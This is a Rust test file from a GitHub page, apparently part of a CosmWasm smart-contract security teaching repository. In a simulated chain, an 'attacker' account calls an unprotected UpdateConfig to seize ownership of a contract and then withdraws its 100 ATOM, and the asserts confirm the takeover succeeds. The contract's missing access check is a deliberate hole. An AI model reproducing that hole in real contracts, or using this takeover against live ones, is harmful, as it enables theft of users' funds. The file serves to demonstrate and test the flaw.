-
Notifications
You must be signed in to change notification settings - Fork 11
/
access_control.rs
58 lines (53 loc) · 2.76 KB
/
access_control.rs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
use cosmwasm_std::{Addr, Coin, coin, Querier};
use cosmwasm_std::{QueryRequest, BankQuery, to_binary, from_binary, BalanceResponse};
use cw_access::contract::{execute, instantiate, query};
use cw_access::msg::{InstantiateMsg, ExecuteMsg};
use cw_multi_test::{App, ContractWrapper, Executor};
fn mint_native(app: &mut App, beneficiary: String, denom: String, amount: u128) {
app.sudo(cw_multi_test::SudoMsg::Bank(
cw_multi_test::BankSudo::Mint {
to_address: beneficiary,
amount: vec![coin(amount, denom)],
},
))
.unwrap();
}
fn query_balance_native(app: &App, address: &Addr, denom: &str) -> Coin {
let req: QueryRequest<BankQuery> = QueryRequest::Bank(BankQuery::Balance { address: address.to_string(), denom: denom.to_string() });
let res = app.raw_query(&to_binary(&req).unwrap()).unwrap().unwrap();
let balance: BalanceResponse = from_binary(&res).unwrap();
return balance.amount;
}
#[test]
fn insufficient_access_control_test() {
let mut app = App::default();
let code = ContractWrapper::new(execute, instantiate, query);
let code_id = app.store_code(Box::new(code));
// The contract has no real life functionality
// It can change the config of the contract
// It can send current balance to chosen receiver.
let contract_addr = app
.instantiate_contract(
code_id,
Addr::unchecked("owner"),
&InstantiateMsg { owner: Addr::unchecked("owner").to_string() },
&[],
"Contract",
None,
)
.unwrap();
mint_native(&mut app, contract_addr.to_string(), "ATOM".to_string(), 100);
//this should fail
let withdraw_res = app.execute_contract(Addr::unchecked("attacker"), contract_addr.clone(), &ExecuteMsg::Withdraw{destination: "attacker".to_string()}, &[]);
println!("{:?}", withdraw_res.as_ref());
assert!(withdraw_res.is_err());
// Attacker update config
let update_res = app.execute_contract(Addr::unchecked("attacker"), contract_addr.clone(), &ExecuteMsg::UpdateConfig { owner: "attacker".to_string() }, &[]);
println!("{:?}",update_res.as_ref().unwrap());
assert!(update_res.is_ok());
let withdraw_success_res = app.execute_contract(Addr::unchecked("attacker"), contract_addr.clone(), &ExecuteMsg::Withdraw{destination: "attacker".to_string()}, &[]);
println!("{:?}",withdraw_success_res.as_ref().unwrap());
assert!(withdraw_success_res.is_ok());
let balance = query_balance_native(&mut app, &Addr::unchecked("attacker"), &"ATOM");
assert_eq!(coin(100, "ATOM"), balance);
}